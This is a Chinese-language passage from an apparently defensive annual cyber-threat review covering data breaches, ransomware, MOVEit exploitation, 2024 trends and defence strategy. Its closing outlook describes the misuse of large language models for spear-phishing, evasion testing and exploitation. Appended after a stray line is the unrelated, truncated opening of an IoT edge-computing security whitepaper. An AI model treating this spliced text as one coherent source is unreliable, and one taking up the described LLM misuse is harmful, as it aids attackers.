在万物互联的数字化时代,数字经济已经快速崛起,使得数据已经成为一种重要的资产和战略资源,随之带来的风险也在不断攀升。据相关机构统计,2023年,全球每次数据泄露平均损失达445万美元,创历史新高[30]。数据泄露比较严重的组织已经越来越偏向于关键信息基础设施领域和产业链中上游,其中卫生医疗行业已连续12年成为数据泄露成本的“领先”行业。这些组织存储的数据具有一定“公信力”,存储的数据较完善、真实性较高、数据量较大、数据类型较全,因此这类数据被认为具有很高的价值。据研究显示,83%的泄露事件是出于经济动机[31],而这类具有高价值的数据将会更加受到攻击者觊觎。随着攻击手段的不断更新和漏洞武器化,使得攻击这些存有高价值数据的组织成本变低,因此数据窃取的目标将会愈加趋向选择这些组织。 3.4.2 勒索攻击相关的数据泄露风险 勒索攻击的目标和数据泄露的目标重合度很高,被勒索攻击的目标往往存有高价值的数据,勒索这些组织也往往会获得更高的收益。勒索攻击逐渐形成了通过深入的目标分析和侦察,有选择性地攻击关键的系统、数据或信息,迫使受害者在支付高昂赎金和遭受关键数据泄露的损害之间做出选择。无论是否支付赎金,被窃取的数据处置权都在攻击方手中,仍然会给受害方带来数据泄露的风险。勒索攻击一般是为了经济利益,受害方的高价值数据也为勒索者提供了一项“副业”,因此存在勒索攻击的地方就基本会伴随着数据泄露的风险。 为了逼迫受害方支付赎金,一些勒索组织会预先公布部分泄露的样例文件,威胁或诱导受害方满足其要求,并以此作为与受害方谈判的筹码。中国台湾电脑零部件制造商微星(MSI)被勒索软件团伙Money Message攻击[32],该团伙宣称从微星的企业网络中窃取到了源代码,在其网站中发帖展示CTMS与ERP数据库,以及包含软件源代码、私钥和BIOS固件文件的屏幕截图。威胁微星满足其勒索要求,否则将在五天内公布这些被窃取的文件。最终微星拒绝了其勒索要求,但也因此导致微星、英特尔等公司承受了巨大代价。 3.4.3 漏洞利用依然是窃取数据攻击的主要突防点 2023年备受瞩目的漏洞之一MOVEit漏洞,在MOVEit被发现存在多个高危漏洞后(CVE-2023-34362,CVE-2023-36932,CVE-2023-36933,CVE-2023-36934),一波网络攻击和数据泄露浪潮就开始出现。攻击者利用这些漏洞可以查看、修改、删除数据库,也可以提升用户权限和执行代码。从5月开始MOVEit漏洞就已经被黑客组织利用,根据统计,截至9月份仅勒索组织Cl0p利用MOVEit漏洞攻击的组织数量已超过2000个,受影响的人数超过6000万,MOVEit漏洞的受害者清单正在持续增长,而勒索组织Cl0p也暂时放弃使用勒索软件,转而只窃取敏感数据,并威胁缴纳赎金,否则将其数据泄露出去[33]。截至12月20日,受到攻击的组织已增长到2611个,如图2‑5。 图3‑5 勒索组织Cl0p利用MOVEit漏洞攻击的各国组织数量 受害者虽多在欧美,但同样给国内的网络安全领域敲响了警钟,勒索组织Cl0p已经多次利用高危漏洞窃取数据进行勒索并得逞,需要警惕他们的“示范作用”可能会吸引其他黑客组织的效仿。高价值的数据已经能够使勒索组织暂时放弃勒索软件直接用数据勒索,数据系统被攻击产生的影响不容小觑,数据安全需要各行各业都予以重视,防范措施需要及时、有效。 3.4.4 政治因素引发的数据泄露威胁国家安全、影响国际局势 2023世界地缘政治局势动荡,引起不同阵营的黑客组织或个人的激烈交锋,因此也伴生了大量的数据泄露。如北约军事档案数据泄露事件,泄漏了大量的飞机、导弹、无人机、军舰等军事设施的图纸、技术参数等信息。网络安全公司CloudSEK的人工智能数字风险平台XVigil发现[34],由于印度对以色列的长期支持,多个黑客组织策划了对印度的网络攻击。这些攻击背后的动机主要围绕政治因素,造成的多起数据泄露,严重影响了国家、组织和个人的安全。 涉俄乌冲突的机密文件被泄露更是直接影响了俄乌冲突的走向。泄露的文件涉及俄乌冲突方面的情报,详细描述了乌克兰和俄罗斯军队的部署和状态,尤其是暴露了乌克兰防空系统的潜在漏洞,这对乌克兰计划发起的春季反攻带来了情报威胁。其他文件情报集中在中东以及印度洋与太平洋地区的国防和安全问题上,暴露了美国对韩国、以色列、乌克兰等盟友进行监听的“间谍活动”,这可能将引发新一轮信任危机[35]。此次泄密事件被外媒称为自2013年“棱镜门”事件以来美国最大的泄密事件[36]。 巴以冲突和俄乌冲突中,各国情报机构和黑客组织的深度介入,使其在外围形成了“网络战场”,政治因素引发的数据泄露将会威胁到国家安全,影响地区或国际局势。在复杂多变的国际局势下,我国同样面临着数据安全的挑战,需要做好迎接挑战的准备。 4.2023年威胁趋势总结 回顾2023年重点威胁,高级持续性威胁(APT)活动整体形势依然严峻,定向勒索即服务(RaaS)模式趋于成熟导致勒索攻击愈演愈烈,利益驱动下的挖矿、远控、数据窃密等黑产威胁更加隐蔽化、复杂化以及威胁泛化引发的可攻击面不断扩散和放大。威胁永不眠,具有各种政治、经济、军事意图的攻击行为,对我国网络空间安全治理提出了更具针对性和更深层次的挑战。 ➤攻击者利用认知和防护盲区进行突破。 无论是超高能力国家/地区行为体、高级能力国家/地区行为体、一般能力国家/地区行为体,还是网络恐怖组织、网络犯罪团伙或黑客组织、黑产组织、业余黑客等发起的网络攻击活动都有可能穿透现有防御体系,攻击者借助“假旗”(False Flag)策略,穷尽各类攻击手段(甚至直接招募内鬼),面向组织的人力、财务、运维、客服等与互联网进行高频、深度交互的人员开展线下和线上攻击,采取社会工程学方式并利用人员疏于防范的安全意识,突破组织的安全防线。纵深防御和资源分配不应只是基于拓扑和资产分布的均匀分配,而应形成针对性、有重点的资源投放。 ➤攻击者对漏洞资源的利用效率远胜于防御方。 由于攻击者能熟练使用网络空间测绘引擎的等开源情报,并长期关注积累对重要信息目标的暴露面,因此在POC代码出现后,会有一大批攻击者快速匹配寻找可突防目标。安天CERT把类似攻击称为1Exp攻击。由于RaaS+定向勒索本身又构成了一种“众筹犯罪”模型,导致关注不同目标资源或拥有目标信息资源的大量攻击者,都可能在发现机会窗口时尽可能的将机会窗口转化为实际收益。 ➤安全产品本身极易成为攻击突破口。 由于网络设备和网络安全设备本身是一种容易获取的资源,安全产品本身极易成为被忽略的攻击入口,这些重点威胁明确暴露出这样一个事实:安全产品(设备)或具有一定安全能力的产品(设备)其本身并非是绝对安全的,其整体的设计机理都是将安全能力作用于外部环境对象或者流量对象,并未真正将自身作为可能被攻击者所攻击的目标来强化自身的安全特性。同时,这些产品(设备)在现实应用中,又因其带有安全功能,往往给用户带来了“其自身是安全的”的认知错觉,从而使其更容易成为攻击者的突破点。 ➤基于身份+权限+访问控制的合规体系极易被突破。 统一的身份认证机制、权限管理和访问控制机制是安全合规体系的重要基石。特别是统一身份认证在支撑了安全的情况下,又带来了使用上的便利性。但波音事件攻击者较容易地进行了相关凭证和身份的窃取,之后便利用这些凭证进行攻击和横向移动。由于相关行为不是一般性的探测扫描,而本身就是基于绑定凭证的定向植入与投放,导致攻击过程中波音方面完全无感。这说明在没有有效的、细粒度的感知和敏捷闭环运营能力支撑下,身份权限机制一旦被突破,就反过来成为了攻击者的掩护,从而使攻击者在整个合规体系中畅行无阻。 ➤混合执行体攻击越来越普遍。 不同层次的攻击者不断借鉴和改进其技战术策略,除了使用商业工具、自研工具以及开源工具外,也逐渐将合法工具纳入其武器库,在一些类似的定向勒索或APT级定向攻击中,基于攻击装备清单的梳理,往往同样有很大比例不再是传统意义上的恶意代码,而是为正常的网络管理应用目的所编写的工具或脚本,其中不乏知名的开源工具和商业产品,这些开源工具和商用产品往往都带有发布厂商的数字签名。这种组合运用多种来源执行体的攻击,安天CERT称之为混合执行体攻击。这就使攻击从早期的基于免杀的方式对主机的突防,进一步走入到可以击破反病毒引擎+可信验证的双安全系统的混合执行体攻击。防范这种攻击,简单结合反病毒引擎+可信验证,显然是颗粒度不足的。 ➤主机安全防护依然没有得到有效的强化。 攻击者采用各种方式穿透边界防御措施并建立持久访问,本质上必须依赖在主机侧投递、加载、运行载荷并最终达成致效,在波音遭受勒索事件中波音公司的防御体系几乎无感,表明其主机侧安全产品和运营能力极为不足,而这一问题在国内更为严重:在数字化发展背景下,对“安全的基石回归主机系统侧”这一必然趋势认识不足,对主机侧的安全需求依然理解为合规性的主机杀毒软件或防护软件,并更倾向以低廉的价格而非更有效的能力去选择产品。同时,由于主机侧工作更复杂、细腻,牵扯与信息化和使用部门的关系更多,导致防御者不愿意在主机侧投入主要的安全成本和管理资源,这些都会导致最后一道安全防线越来越难以抵抗定向攻击。 5.2024年威胁的展望 ➤RaaS+定向攻击会更加致命且高发:RaaS模式不仅仅是提供技术基础设施,而是结合宣传炒作、曝光窃取数据、拍卖窃取数据、将受害人举报到监管机构等方式对受害人实施压力,并制造新闻热点,提升品牌效应,从而以滚雪球方式让勒索组织形成臭名昭著的品牌效应。定向勒索模式针对高价值目标,RaaS的附属成员通过各种方式,包括购买0Day漏洞、研发高级恶意代码、收买企业内鬼和情报等手段提高突防能力,提升勒索载荷落地成功率。这种定向+RaaS的“组合拳”模式,形成“定向勒索+窃密+曝光+售卖”链条作业,胁迫受害者支付赎金从而实现获利。 ➤警惕毁瘫痪基础设施的攻击伪装成勒索攻击。勒索攻击成功的直接后果是单位系统和业务的瘫痪和中断,这和信息战手段的致瘫达成了完全一致的效果。因此将毁瘫系统的攻击活动伪装成勒索攻击必然会是不断出现的事件。这种攻击方式在历史上已经被证明,目前可证实的最早出现的此类事件是2017年乌克兰遭遇的NotPetya攻击,当时攻击者将乌克兰系统数据加密瘫痪,并且弹出伪装成勒索软件Petya的攻击信息,而实际上其加密是不可恢复的。RaaS设施的出现,大大降低了毁瘫攻击的成本,形成了非常高效的数据损毁与破坏的“战斗部”,因此不管是这种代表极端势力的非国家行为体,包括一些国家地区行为体,都有可能借助RaaS设施展开攻击,这种攻击活动会加剧社会混乱,同时也会容易导致防御方误判相关攻击的性质。 ➤攻击者普遍采用反测绘技术规避探测。当前APT攻击活动跟踪的一个比较重要的情报来源是网络空间测绘,该技术手段可以迅速发现攻击者已经启用或正在搭建准备启用的C2服务器,然而随着对抗的升级和攻击者规避检测的追求,未来攻击者可能将采用多种伪造或拦截等技术手段规避测绘扫描,这可能将会大大降低APT情报获取的数量。 ➤生成式人工智能技术推动鱼叉式钓鱼攻击效率。目前大型语言模型(LLM)的人工智能技术在网络犯罪领域存在较大的滥用空间,如通过学习目标相关的信息资料生成逼真的鱼叉式钓鱼诱骗信件、诱饵文件内容、钓鱼网站页面等,以及辅助自定义恶意功能的多语言编码和免杀测试,挖掘利用软件漏洞,模拟身份与目标开展语音文字等社工交互,都将大大提高攻击者的攻击运营效率。 ➤挖矿木马影响继续下降。近些年我国对非法挖矿活动的打击已经取得了显著成效,挖矿木马事件有所下降,但挖矿活动依旧存在,挖矿木马数量没有减少。新部署的存在弱口令和漏洞的设备依然为挖矿木马提供生存空间。 ➤黑产团伙将会尝试更多途径传播远控木马。当前黑产团伙正通过招募招收大量“代理人”的方式,帮助他们通过即时通讯软件、搜索引擎恶意推广、钓鱼邮件等多种途径传播恶意程序,并且在控制受害者设备后利用社交软件等方式进一步扩大感染范围。在高额利益的驱使下,未来黑产团伙可能将不断尝试新的途径传播远控木马。 ➤大规模数据泄露事件形成常态,全球网民经被黑产全员画像。虽然2023年存在许多历史泄漏数据拼凑出售的虚假信息,但2024年真实的数据泄露事件仍会频繁发生。数据泄露事件原因多样,除了勒索攻击事件、弱口令和高危漏洞入侵可以窃取数据外,还可能通过内部人员、第三方供应商人员窃密,使得安全治理任重道远。 6.防御和治理思考 6.1 深入关注攻击活动的运营方式和社会规律有助于重新理解防御 研究网络攻击活动不能脱离地缘政治安全要素,不能脱离经济社会土壤,要深入关注各种攻击活动的动机和运行方式。以勒索攻击为例,从犯罪获利的角度来看,获得了高额的勒索赎金对应着犯罪团伙能承担更高的犯罪成本,包括购买0-Day漏洞、研发高级恶意代码、收买企业内鬼和情报等。从另一个角度来看,攻击者制造了“如果不缴纳赎金,受害人将承受远比赎金更高的综合损失”的困境。 网络安全对抗与防护已经是一种经济运行机制的对决。从防御侧来看,从预算投入方面,我们通常将网络安全在信息化的占比作为一个衡量标准,这使网络安全长期处在从属、配套和被压制状态。网络安全风险后果是否才应该是安全投入的第一衡量标准,也需要我们来思考。 这从对立面让我们思考网络安全投入与对标究竟应该以什么为衡量标准?我们认为从规划预算角度,网络安全必须是一套有独立评价参照系的独立预算口径,而不是简单设定为信息化的组成部分。网络安全投入合理的衡量标准是其运行资产价值和出现安全事件的风险损失,而并非信息化投入。通过在信息化中有限占比的方式来规划网络安全投入的传统思路已经成为安全能力建设的障碍。其逻辑错误在于错误定义了网络安全的保障对象——因为网络安全能力保障的并不是IT固定资产投入价值,而是业务和数据资产价值。对于高度依赖于信息系统运行的关基设施和政企机构,网络安全保障的是机构的全量价值,对应机构是一个企业,该价值就是企业的业务价值和营收价值,基于这个价值来判断网络安全投入的合理性,才是真正目标化的衡量标准,而不是仅与信息化投入关联所构建的成本化衡量标准。对于中央管理企业和关键基础设施部门,则还需要进一步评价对应的安全风险从企业自身风险连锁扩大到国家安全、社会治理安全和相关公民个人风险的情况。透过LockBit赎金规则,我们看到需要警惕的是:网络攻击者比网络防御者,先行一步认识到了这一规律。 6.2 正确的认知威胁是有效改善防御能力的基础 当前,针对关键信息基础设施和重要网络信息系统的网空威胁攻击活动,已经不再是一般性的技术事件和技术风险,而是带有复杂的国际安全形势和地缘安全竞合背景、具有情报作业或者网络战性质的行为活动。我们需要穿透“网站篡改”、“数据泄露”、“勒索瘫痪”、“钓鱼邮件”等攻击手法和现象,基于科学方法和工程的方式来认知威胁,才能更好地支撑威胁分析工作,并进一步推动防护能力的改善。传统的防护手段仅是建立起网络防御体系的基本工作,对于防范一般性的网络攻击是有效的,但对于防护超高能力网空威胁行为体则是完全不足的。关键信息基础设施防御体系建设必须对标能够防御高能力对手攻击,建立“体系化的防御”才能应对“体系化的攻击”,才能经受得住攻击者和窥视者的“多重检验”。 另外,对勒索攻击的防范,往往还停留在原有的勒索软件的阶段,还有许多人没有意识到勒索攻击已经是由持续定向入侵、窃取数据、加密数据瘫痪系统、勒索金钱、挖掘数据关联价值二次利用、贩卖数据、向监管机构举报、公开窃取数据所构成的一条价值侵害链,而且已经形成了一个规模极为庞大的犯罪产业。在这样的背景下,遭遇勒索攻击的风险已经不是简单的以数据损失和业务暂停为后果的形态,而是要付出失窃的所有数据均会被贩卖、公开等一系列的连锁风险。 从定向勒索攻击的作业方式来看,其在加密毁瘫行为触发前,是类似APT攻击的高度定制化的作业过程。攻击者或者是专业的攻击作业团队,有坚定的攻击意志、较高的攻击能力、充分的可利用漏洞资源,能掌握大量可利用的脆弱性情报和攻击入口资源,有的可能直接就是内部的攻击者。这也是依托RaaS的定向勒索攻击行动,面对有较强IT运营能力和防护投入的大型机构时仍能屡屡得手的原因。 同时,复杂系统的可靠性保障本身不能依赖于每个节点都不出问题,相对于现代信息系统的规模,特别是面对高级威胁行为体的作业能力,单点失效是必然发生的。需要以体系化防御对决体系化的进攻是一个最基本的认识,防御无银弹。无论在勒索防护中扮演最后一道防线的主机系统防护,还是作为最后应对手段的备份恢复,都是防御体系中的单点环节,都在应对高水平定向攻击中担负着在本身能力范围内检测阻断攻击、降低攻击成功率、提高攻击成本、降低风险损失的局部作用,都无法以单点来对抗体系性的攻击。 我们必须严肃的指出:将定向勒索攻击简单的等同于早期非定向扩散或广泛投放的勒索软件的威胁,将对抗勒索攻击简单看成是加密毁瘫vs.备份恢复的单点对抗,是极为落后、片面的安全认知。如果没有一套完整的防护体系和运营机制,而是认为依靠数据备份恢复来应对勒索攻击。就如同只出场一名守门员,来对抗对方一支球队。 6.3 客观的敌情想定是做好网络安全防御工作的前提 近年来,我国网络安全整体防护水平有了长足进步,但面对高等级网空威胁行为体的有效布防能力依然严重不足,其中原因之一,就是在于对超高能力威胁行为体的能力体系、作业意图、装备与支撑体系认知不足,分析推演不够系统深入。对攻击行为施加于关联场景以及潜在风险后果等重要因素,缺少极限推演。进而导致建设方向偏差、建设思路滞后。 网络安全防护工作,不是一厢情愿的自我臆想与闭门规划实施,而是必须正视威胁、直面对手,将对手和威胁的要素叠加在防御体系上的系统而严谨的工作,是一场关乎国家前途命运和人民福祉的伟大斗争。要充分认识到网络安全所面临敌情的高度严峻性,要立足于大国博弈与地缘安全斗争的大背景,深入贯彻总体国家安全观。把敌情想定构建作为网络安全规划的重要步骤,把“敌已在内”作为基础的想定,针对性地分析对抗场景与条件因素,综合研判目标价值、威胁行为体行动与后果之间的相互作用关系,深入洞悉对手意图目的,真正以高能力网空威胁行为体的组织建制、支撑体系、攻击装备、作业手段、作业体系与行动特点为客观依据,叠加到具体的防御场景上推演分析,完善对网络安全防御工作的规律认知,形成以有效防护为导向的能力建设与实战检验标准。要始终坚持客观敌情想定是网络安全工作的前提,不怯于认知敌情工作的长期性、持续性与艰巨复杂性,不被网空敌情的低可见性所迷惑,不被陈旧的认知与错误的观念所误导,坚持战略上藐视对手,战术上重视对手,将网络安全防御工作建立在正确的敌情想定基础之上,真正打造动态综合有效的网络安全防御能力。 从定向勒索攻击造成后果损失来看,我们必须改变对安全风险与价值的认知范式。由于定向勒索攻击已经形成了窃取数据、瘫痪系统和业务、贩卖数据和曝光数据的组合作业。其最大风险不只是系统和业务瘫痪无法恢复,而是同时面临被攻击企业的用户信息、关键数据、文档、资料、代码等核心资产被倒卖,被公开的风险,从而带来更大的连锁反应。从国内外安全领域长期以来的现实情况来看,很多政企机构改善自身安全的动力,并不来自于提升防护水平的能动性,很多企事业单位认为最可能发生的安全风险,不是遭遇攻击,而是因达不到合规标准,会遭到处罚。因此,安全防护领域构成了一套“投入-合规-免责”的低限建设运行逻辑。而定向勒索攻击所带来的后果,让IT决策者必须判断极限风险,并通过极限风险损失来判断网络安全的工作价值,如何避免业务长时间中断、数据彻底无法恢复、被窃取的数据资产被竞争对手购买,或因曝光严重贬值等极限情况,都是IT决策者和每一个机构必须应对的风险。 针对此类定向攻击的防护必然不是以单点进行突围,必须从整体防护上出发,坚持关口前移,向前部署,构成纵深,闭环运营。最终通过防护体系以达成感知、干扰、阻断和呈现定向攻击方杀伤链的实战运行效果。 通过以定向勒索攻击为代表的案例,可以看到除了合规要求和既有存量之外,分析网络安全投入的关联要素还需要考虑:业务和数据资产的全局价值;攻击可能造成的最大风险损失;遭遇攻击者的可能性以及攻击者能力所能承担的攻击成本,以上因素是安全投入合理性的有效衡量标准。单纯依靠政企机构本身,往往只能知己、不能知敌人,难以完成高质量的评估,因此需要公共产品进行赋能。 6.4 高质量的技术分析是重要的战略支撑能力 深入系统的威胁分析能力,一直是国内网络安全业界的一个能力长板。在长期的威胁分析斗争过程中(包括上世纪80年代后期的病毒样本分析、本世纪初开始的重大蠕虫事件分析和2010年前后系列APT事件分析),中国网络安全业界输出了大量高质量的分析成果,推动了技术创新、产品开发和持续运营,也有效支撑了相关公共安全领域决策,积累了一大批具有较高分析水平的工程师队伍;从产业层面来看,能进行有效威胁分析的安全企业越来越多。 但需要关注的是:1、在过去几年,高质量的分析成果有减少的趋势。在分析工作中,相对急功近利地追逐先发漏洞、热点事件,但不愿意长时间、大成本投入地持续跟踪深度威胁的情况比较普遍;2、规模型网络安全企业也将分析能力的保持和提升视为一种高昂的企业人力成本,而不愿意进行分析团队的扩建和体系性完善;3、在用户单位和管理部门中,也有一部分人存在着“分析报告就是企业软广”的偏颇认识,而忽视了这种分析工作对于准确判定威胁、溯源威胁行为体、研判防御的重点方向等方面具有极为重要的作用。 需要警惕的是,这些负反馈的作用下,分析能力作为我国产业长板能力会持续退化。 6.5 重新构建主机系统安全层面防御基石 主机系统是业务和资产数据价值的承载者,也是攻击者攻击的最终目标。主机端防护能力的历史颇为悠久,从上世纪80年代中后期就已经开始普及终端杀毒软件,但今天我们在实际的分析、取证、复盘中,发现主机端安全反而成为了其中最薄弱的环节之一。在资产价值向云中主机(工作负载)不断迁移、泛在介入的背景下,防火墙等传统安全环节的价值被急剧弱化,加密流量的广泛使用进一步削弱了流量侧安全能力的可见性,这些因素都迫使安全的支撑基石必须重新回到主机系统侧,确保安全边界构建在每一台主机系统之上,并再将这些细粒度安全边界组织成为防御体系。 在主机的安全防御体系中,将主机环境塑造、恶意代码查杀、主动监测、介质管控、主机防火墙等大量的安全功能进行积木化的整合,实现按需弹性部署,从而在面对钓鱼投放、漏洞突防、恶意介质插入等攻击方式时,能够在主机侧形成包括主机边界防护、对象检测、行为管控、敏感数据保护的微观防御纵深,切实构建主机系统安全层面防御基石。 6.6 以执行体治理为核心抓手持续闭环运营 网空对抗的主要范式,在过去和未来非常长的一个阶段,都是运行对抗。运行是数据基于执行入口向指令转化的过程,运行的依赖条件是防御的关键机会。同时我们必须看到,信息系统以计算能力承载执行体运行,完成其功能和任务的基本模式不会改变;信息系统依赖数据输入输出的运行方式不会改变;威胁行为体持续编写生产恶意执行体的客观事实不会改变。执行体既是网空对抗中的攻击目标,也是“武器化”攻击装备,同时也是防御机制的承载者。所有具备可执行能力、有机会转化为指令的对象,都可归入执行体范畴,从系统IO层面,执行体是最小可治理单元。 绝大部分攻击战术动作依赖执行体完成,攻击者持续侵入可信链,盗用证书加白、供应链污染等攻击手法愈发常见。大量的混合执行体攻击打破了传统的“威胁检测+可信签名”的防御检测范式。攻击者更注重利用系统环境中已经存在的可利用执行对象(如系统shell),并将大量开源和商用正常工具作为实现攻击的路径和工具。这些开源和商用软件在政企机构中有着广泛应用,有的软件本身就带有合法甚至知名机构赋予的信誉,这就使我们面向执行体对象的识别颗粒度要至少到达每一个活跃和新增对象,最小化地缩窄执行入口,最大化地管控系统。这些工作既需要强大的共性能力赋能,也需要每一个关键基础设施和重要信息系统去建立自己的执行体治理基线和闭环运营机制。当然,这些工作离不开能支撑执行体治理的、有效的主机安全防护软件。 以执行体对象为核心抓手开展防御治理工作,对网络安全基本能力具有重要价值意义。在识别环节,可以掌握执行体的行为与业务之间的支撑关系,理解执行体及其所需权限,掌握执行体具备的能力及其与脆弱性、暴露面的对应关系;在塑造环节,可以管控执行体开放服务及存在执行更新能力的通道;在防护环节,可以识别 执行体的资源访问、连接、创建、写入、执行的客体,判断其行为目的,对违规行为进行拒止;在检测环节,可以基于执行体分布和行为监测,筛选出值得关注的、未知的执行体;在响应环节,可以基于执行体的潜在和激活能力、创建信道等手段,支撑追溯攻击来源等。 执行体治理是网络安全运营者通过识别和管控执行体保障网络安全的持续过程。持续过程不仅要完成检测、防御、清除恶意执行体和控制非恶意执行体网络访问等基础防护,更要建立识别、塑造、检测、防御和响应的流程闭环。在流程运行闭环的基础上,全面掌握执行体的静态分布情况与业务应用的执行体构成,建立信誉清单,同时能够识别执行体的执行动作并依据基线进行控制。在基线建立之后,识别全部执行体,全面掌握执行体和执行体的行为与业务之间的支撑关系,建立信誉指标、行为指标、业务影响指标等量化指标,以指标为指引针对不同场景建立配套的管控规则库、基线库和模型库,并持续运营实现能力与时俱进、效能不断提升。从而保持防御主动,构建防御能力对攻击者的不确定和不可预测性,提升攻击绕过难度,束控攻击活动,降低失陷风险。 6.7 坚持构建动态、综合的防御体系而不是始终摇摆 不断出现的各类重大安全威胁事件,容易产生类似最应重点防范勒索攻击还是APT攻击一类的疑惑。从水平上看,少数勒索攻击的前导攻击部分的水平,已经接近高级网空威胁行为体的APT攻击水准,而且勒索攻击将比APT攻击带来更直接和快速的经济损失与显性的机构信誉影响。定向勒索攻击确实是APT能力+勒索行为的结合体。但从另一角度看,由于勒索攻击组织必然要在一个相对短周期获益,其并无APT攻击者那样必须突破中心目标的关键意志力,其在长期潜伏、持久化和隐蔽作业方面,不会表现出APT攻击者的战略耐心。所以对每一个政企机构来说,其资产人员暴露面,一方面必然同时面对者多种攻击组织,但其可能遭遇的最高烈度或水平的攻击的判断,需要基于将其综合业务资产价值放到复杂的社会安全和地缘安全的背景下进行想定判断。 但必须指出的是,对大量机构来说,目前存在的并非在防御重点是APT攻击还是勒索攻击的选择问题,而是尚未完成防御基本面建设的问题。针对各种复杂的组合攻击,都需要防御层次的展开,都不存在“一招鲜,吃遍天”,所有资源、人力、策略投入的弹性调整,其前提都是已经完成了防御基础能力建设的基本动作,基本形成了动态综合、有效闭环的防御体系。这才能做到针对威胁变化实施针对性布防。可以说防御体系如能有效防御APT攻击,那么也能有效防御定向勒索攻击。 面对威胁挑战。战术上的高度重视和战略上坚定信心都是重要的。我们要坚信虽然定向勒索攻击防范难度很大,但依然有系统化的方法的和落地抓手。针对体系性的攻击,必须坚持关口前移,向前部署,构成纵深,闭环运营。提升攻击者火力侦察和进展到外围地带的发现能力,降低攻击方进入到核心地带的可能性。提升网络和资产可管理性是工作的基础:主动塑造和加固安全环境、强化暴露面和可攻击面的约束和管理、强化对供应链上游入口的管控、启动全面的日志审计分析和监测运行。构建从拓扑到系统侧的防御纵深,针对攻击者探测、投放、漏洞利用、代码运行、持久化、横向移动等行为展开层层设防,特别要建设好主机系统侧防护,将其作为最后一道防线和防御基石,构建围绕执行体识别管控的细粒度治理能力。最终通过基于防御体系实现感知、干扰、阻断定向攻击杀伤链的实战运行效果。
standards
1 前言 十八大以来, 党和政府将网络安全的战略高度提升到了信息化的 同等水平。这一理念不断通过我国的网络安全法和等级保护保护标准 体系进行落实, 已经逐步成为我们引入任何信息技术时首要考虑的问 题之一。 随着物联网的不断发展, 物联网云计算中心面临着海量设备接入 和实时控制响应的需求,特别是在城市基础设施智能化(电力、水务 等)和智能控制领域(智能制造、车联网等)。此时引入边缘计算范式实 现边缘智能控制, 提升系统的控制实时性和网络经济性成为一种必然。 在物联网环境中, 物联网终端普遍计算能力和安全防护能力较弱, 存在比较严重的安全问题;新引入的边缘计算节点带来的云-边协同 虽然可实现边节点对终端的冗余支持和边界点的无缝移动, 不仅进一 步增加了终端管理的难度, 也引入了终端数据安全问题。同时, 边缘 计算范式引入到物联网环境中,又给物联网的安全防护带来了机遇, 可以通过引入边缘安全防护节点强化局部物联网的设备入网认证管 理、行为模式安全、基于密码的访问控制, 从而使得局部物联网的安 全性大大提升, 同样分布式的边缘计算节点也为构建分布式非对称密 码体系带来了可能。 本白皮书首先对物联网边缘计算的框架, 所涉及的安全主题和国 内外标准及国家政策进行综述; 然后从风险分析出发, 列举当前可应 用于物联网边缘计算范式中的主流安全防护技术; 本文进一步提出物 联网边缘计算的防护框架和安全防护体系, 可引导读者在工程实践中 可信边缘计算推进计划 1 开展物联网边缘计算安全防护体系的建设。最后本文列举多个实用案 例,进一步阐述物联网边缘计算的安全体系的应用 我国网络安全工作采用“ 同步规划、同步建设、同步运维” 的三同 步原则,因此物联网边缘计算安全防护在推进物联网边缘计算过程中, 尤为重要。 2 物联网边缘计算安全概述 2.1 物联网边缘计算框架 物联网边缘计算, 是为了解决物联网局部的实时控制和本地化智 能控制,而引入边缘计算范式的一种新型计算场景。 图 1.1 物联网边缘计算框架图 物联网边缘计算框架如 0.1 所示,主要包括以下部分: 1) 终端设备:终端设备主要包括传感器、智能仪器仪表、智能伺 2 可信边缘计算推进计划 服电机、 RFID 芯片、 自动化机械臂、AGV 小车等, 可在一个 局部应用场景,完成信息采集和局部控制。 2) 物联网局域网络:物联网局域网络根据具体应用场景,有 WIFI、 蓝牙、NFC、ZigBee、4G/5G Lite 等,也可通过有线网络实现 终端设备之间和与边缘边缘控制器的网络通信。 3) 边缘节点:边缘节点主要包括具有边缘算力的智能终端设备、 控制设备、边缘控制器、边缘网关、边缘计算盒子等, 通常部 署在现场,实现智能感知、实时控制、实时数据处理和实时决 策。边缘节点分为边缘网关和边缘计算节点两种类型。边缘网 关负责边缘网络的访问控制, 内部安全管理和协议转换等工作; 边缘计算节点主要提供边缘算力。 4) 边缘云:边缘云是边缘节点通过网络连接在一起,可实现互相 支持,分布式管理的边缘节点云。 5) 边缘应用:利用边缘侧的基础设施和边缘平台提供的基础能力, 可以开发和部署各种边缘侧的物联网应用和物联网服务。 6) 边缘接入平台: 边缘接入平台位于云端, 主要实现云平台对边 缘平台基础设施、边缘设备等资源的管理, 提供将云上的应用 和服务延伸到边缘的能力, 实现边缘和云端的数据和能力的协 同,提供完整的边缘和云平台一体化协同服务能力。 7) 边缘数据。边缘数据是物联网在边缘侧产生的采集数据、配置 数据、 决策数据、 状态数据、模型数据等原始或衍生数据。这 些数据呈现结构化、 半结构化、非结构化等多种格式, 具有分 可信边缘计算推进计划 ; 布广泛、数量巨大、时序性强等特点。 物联网边缘计算在许多行业都有广泛的应用和发展, 特别是那些 需要实时执行控制和局部智能化的行业,可见物联网边缘计算的应用 优势更为明显。 1) 电力能源: 边缘计算可提高电力能源行业的发电、 配电、用电 等环节的大型物联网的工作效率。例如,通过边缘节点的引入 可统合分布式发电、 储能、 配电、用电的一体化智能, 并通过 引入区块链技术(能源币) ,促进分布式新能源生产利用。 2) 工业制造业: 边缘计算可以提高制造业的生产效率和质量, 同 时可以实现设备的智能化和自动化管理。例如,在生产线上使 用边缘计算技术可以实现实时智能控制和预测维护, 以及优化 生产计划和维修管理等。 3) 智慧城市:边缘计算可以实现城市的智能化和数字化转型,例 如,通过边缘计算技术可以实现智能交通、智能安防、智能环 境等应用。同时,边缘计算还可以提高城市的能源利用效率和 环境保护水平。 4) 物流业:边缘计算可以提高物流业的运输效率和安全性,例如, 在物流车辆上使用边缘计算技术可以实现实时监控和路径优 化,以及智能配送和签收等应用。 2.2 安全概念 2.2.1 物联网安全 物联网的主要风险点包括终端、物联网卡、通信网络、云端、 服 4 可信边缘计算推进计划 务器端、物联网数据和应用端的安全风险。 目前, 物联网安全已经完成标准化过程,在我国网络安全的强制 标准体系——“ 等级保护标准体系” 中, 已经对物联网安全进行了扩展 要求的定义。框架定义如 0.1 所示: 图 2.1 物联网安全框架 在物联网边缘计算中, 物联网的安全风险主要引入了海量的物联 网终端设备, 且这些设备的操作系统不支持传统安全措施部署,引入 了终端设备认证、入网认证和完整性问题; 边缘层面又引入了边缘计 算容器,这些容器自身安全方面几乎没有专属设计和专用产品;与此 同时, 